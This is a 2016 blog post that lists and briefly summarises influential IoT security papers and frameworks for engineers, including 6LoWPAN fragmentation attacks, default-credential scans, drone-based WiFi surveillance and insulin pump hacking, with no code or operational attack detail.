Attacking the Internet of Things for Fun and Profit


Last updated 22nd Sept. 2016.

Below we’re collecting the most interesting and influential IoT Security papers. This post targets engineering professionals who want to jump-start their IoT Security foo or wish to move into this Brave New World that is the Internet of Things or more specifically learn about IoTSecurity.

Venture Capitalists whenever they hear about you're working on some new InfoSec idea for the IoT
Venture Capitalists whenever they hear about you’re working on some new InfoSec idea for the IoT

The below content is evolving (hopefully with your help). If you find something missing please drop me a tweet or comment below and let us know why a certain document should be mentioned.

Sitting comfortably?

OK then before we begin let’s get some basic terminology right (or not). The IoT brings together many different industries and because it means many different things to different people language and avoiding ambiguity is important. I personally have a slight dislike for new buzzwords like “Internet of Cars” or “Internet of ” and would prefer industries concentrate on the common collective technical and social challenges presented instead of trying to redefine terminology.

IMO IoT is never limited to consumer devices but some people see it through only this lens. IoT instead should better be summed up as the collective challenges and opportunities presented by connecting any device to an IP based protocol which previously had no such network connection. This then includes ICS/SCADA, M2M networks, connected cars, in-vehicle networks, …

The picture illustrates the usual process of how Tech Terminology is being agreed upon. The general rule of thumb is that there are no rules and whoever screams loudest and has the biggest mind-share on social media wins the battle.
The picture illustrates the usual process of how Tech Terminology is being agreed upon.

***

In case you need a more general and “high-level” overview on IoT Security please check out these IETF drafts on “Security Considerations in the IP-based Internet of Things” or the 6LoWPAN specific “IPv6 over Low Power WPAN Security Analysis” both of them contain some very readable references at the bottom that let you dive in as deep as you’re comfortable to go.

Not a Security Paper as such, but still an excellent resource is the RFC6568: Design and Application Spaces for IPv6 over Low-Power Wireless Personal Area Networks (6LoWPANs)” . It illustrates some real-life 6LoWPAN deployment scenarios using examples from different IoT verticals such as Connected Home, Industrial/Structural/Agricultural Monitoring, Healthcare & Vehicle Telematics. Another more general resource worth studying is the NATO Cyber Security Framework. If you’re looking at IoT from a defense, and national cyber security lens, then I’d like to point you to my article on smart-cities and cyberwar.

***

6LoWPAN Fragmentation Attacks and Mitigation Mechanisms:

as the title says this paper is heavily focused on 6LoWPAN attacks and gives an overview over how 6LoWPAN fragmentation works and how exceeding the frame size allows abuse of trivial infrastructure (your home automation) or critical infrastructure such as industrial control systems.

6LoWPAN fragmentation Attacks and Mitigation Mechanisms
6LoWPAN fragmentation Attacks and Mitigation Mechanisms

 

A Quantitative Analysis of the Insecurity of Embedded Network Devices: Results of a Wide-Area Scan

Many IoT devices are vulnerable to simple intrusion attempts, for example, using weak or even default passwords. Malware is taking over these devices so once compromised they can later be utilized to participate in DDoS attacks, send spam or phishing mails as part of a massive botnet. In 2012 the Carna botnet showed that there were more than 1.2 million open devices that allowed logins with empty or default credentials. This paper explores strategies to significantly reduce the number of trivially vulnerable embedded devices currently on the Internet.

A Quantitative Analysis of the Insecurity of Embedded Network Devices: Results of a Wide-Area Scan
A Quantitative Analysis of the Insecurity of Embedded
Network Devices: Results of a Wide-Area Scan

 

Digital Terrestrial Tracking: The Future of Surveillance (on a budget)

The next paper has been all over DefCon and BlackHat and illustrates a concept tool called Snoopy that shows you how creepy things can become if we let them. Snoopy uses an onboard computer, a GPS unit, a GSM cellular unit for network connectivity, and attached video cameras with a quadcopter drone to capture wireless network traffic and to follow targets in a defined area. It also takes advantage of Bluetooth and RFID network traffic to track devices and their owners and tracks network probes from devices such as smart phones that are constantly searching for WiFi networks they have previously associated with. The Snoopy drone then offers a WiFi network with the same name as the one being probed. When a smart phone joins this network, Snoopy proxies the network traffic and therefore can be used to capture data being transmitted by the phone. Snoopy can also capture data from devices such as pacemakers that use WiFi, as well as fitness devices and smart cards.

Digital Terrestrial Tracking: The Future of Surveillance
Digital Terrestrial Tracking: The Future of Surveillance

 

Cross domain contamination:

The IoT benefits from a massive amount of “cross-domain fertilization” (holy sh1t this sentence is so much buzz it makes my head spin even without a hashtag) and ideas jump the fence across traditional industry silos. But in a security perspective (think heartbleed, LogJam or Drown) this fertilization becomes cross-domain contamination.

IoT Cross-Domain contamination. You're a heartbleed now.
IoT Cross-Domain contamination. You’re a heartbleed now.

With the Web of Things (structured data, JSON-LD, RESTful API’s, CoAP, and the Web’s bug ridden backend/middleware systems) becoming the way we interface and structure data in IoT we transport the same flaws and challenges over into the real world. These challenges are old news and usually targeted at the web-facing IoT control interfaces and range from Cross-Site-Scripting (XSS) attacks to SQL injection and even attacks against the design UI/UX, … basically anything that we have never really solved in the “Web of Pages” we’ll be even harder pressed to secure in the IoT.

Hacking Medical Devices for Fun and Insulin: Breaking the Human SCADA System

This paper by Jerome Radcliffe too has been all over security conferences and is an infamous flagship example of security fails. The attack illustrates how to mess with a patients insulin pump potentially killing the target.

Hacking Insulin pumps and medical devices
Hacking Insulin pumps and medical devices

 

The Cloud Security Alliance has an excellent paper on Security Guidance for Early Adopters of the Internet of Things (IoT) dated April 2015. It provides a bird-eye perspective over the major security & privacy challenges to be considered.

Security Guidance for Early Adopters of the Internet of Things (IoT)
Security Guidance for Early Adopters of the Internet of Things (IoT)

The Industrial Internet of Things Volume G4: Security Framework, was rolled out by the “Industrial Internet Consortium“. It is a set of best practices to help developers and users assess risks and defend against them. Like other IIC projects, the security framework is an attempt to build consensus among companies building and using IoT. The group has laid out a systematic way to implement security in IoT and a common language for talking about it.

Industrial Internet of Things Volume G4: Security Framework
Industrial Internet of Things Volume G4: Security Framework

This is just a start – this post will grow in content over time … please help by suggesting relevant content. Especially anything related to practical attacks, threat models, etc …

We have started a LinkedIn discussion group for IoT Security which is growing at tremendous speed and has some very knowledgeable people participating (many well known within the InfoSec community and often speak at places like DefCon, CCC, BlackHat, HITB …). You should come and join us!

 

Joachim Bauernberger
Passionate about Open Source, GNU/Linux and Security since 1996. I write about future technology and how to make R&D faster. Expatriate, Entrepreneur, Adventurer and Foodie, currently living near Nice, France.

Valbonne Consulting provides Research & Consulting for emerging technologies in Internet/Web of Things (WoT/IoT/M2M) and Emerging-Tech. We specialise in decentralisation, security and privacy. We work across a variety of traditional industry verticals (Telecommunications, Automotive, Energy, ...). We support Open Source and technologies built on open standards.

Leave a Reply

Your email address will not be published. Required fields are marked *